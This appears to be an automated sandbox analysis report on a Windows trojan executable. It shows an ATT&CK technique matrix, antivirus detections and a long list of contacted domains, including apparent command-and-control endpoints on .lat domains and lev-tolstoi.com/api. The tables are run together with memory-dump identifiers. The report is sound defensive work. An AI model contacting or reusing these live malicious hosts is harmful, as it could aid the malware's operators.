                Source: Yara matchFile source: 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets21
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                0gnHF2twcT.exe58%ReversingLabsWin32.Trojan.Generic
                0gnHF2twcT.exe54%VirustotalBrowse
                0gnHF2twcT.exe100%AviraTR/Crypt.XPACK.Gen
                0gnHF2twcT.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                23.55.153.106
                truefalse
                  high
                  lev-tolstoi.com
                  104.21.66.86
                  truefalse
                    high
                    sustainskelet.lat
                    unknown
                    unknownfalse
                      high
                      crosshuaht.lat
                      unknown
                      unknownfalse
                        high
                        rapeflowwj.lat
                        unknown
                        unknownfalse
                          high
                          grannyejh.lat
                          unknown
                          unknownfalse
                            high
                            aspecteirs.lat
                            unknown
                            unknownfalse
                              high
                              sweepyribs.lat
                              unknown
                              unknownfalse
                                high
                                discokeyus.lat
                                unknown
                                unknownfalse
                                  high
                                  energyaffai.lat
                                  unknown
                                  unknownfalse
                                    high
                                    necklacebudi.lat
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      aspecteirs.latfalse
                                        high
                                        sweepyribs.latfalse
                                          high
                                          sustainskelet.latfalse
                                            high
                                            rapeflowwj.latfalse
                                              high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                high
                                                energyaffai.latfalse
                                                  high
                                                  https://lev-tolstoi.com/apifalse
                                                    high
                                                    grannyejh.latfalse
                                                      high
                                                      necklacebudi.latfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/chrome_newtab0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://player.vimeo.com0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/recaptcVcc0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://lev-tolstoi.com:443/apin.txtPK0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://duckduckgo.com/ac/?q=0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://steamcommunity.com/profiles/7656119972433190066U0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://steamcommunity.com/?subsection=broadcasts0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://store.steampowered.com/subscriber_agreement/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.gstatic.cn/recaptcha/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://store.steampowered.comm0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://cdn.fastly.0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.valvesoftware.com/legal.htm0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://store.steampow0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://www.youtube.com0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://necklacebudi.lat:443/apigl0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://www.google.com0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://grannyejh.lat:443/api0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://s.ytimg.com;0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://steambroadcast-test.akamaized0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://store.steamp0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steam.tv/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://store.ste0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://lev-tolstoi.com/apickc60gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://lev-tolstoi.com/0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://store.steampowered.com/privacy_agreement/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com:443/profiles/765611997243319000gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/points/shop/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl00gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://ocsp.rootca1.amazontrust.com0:0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://sketchfab.com0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.ecosia.org/newtab/0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://lv.queniujq.cn0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://aspecteirs.lat:443/api0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.youtube.com/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://crosshuaht.lat0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://store.steampowered.com/privacy_agreement/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://lev-tolstoi.com:443/apil0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.google.com/recaptcha/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://checkout.steampowered.com/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/;0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/about/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://lev-tolstoi.com/apivZ0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://steamcommunity.com/my/wishlist/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://sweepyribs.lat:443/api%l0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://help.steampowered.com/en/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://steamcommunity.com/market/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://store.steampowered.com/news/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
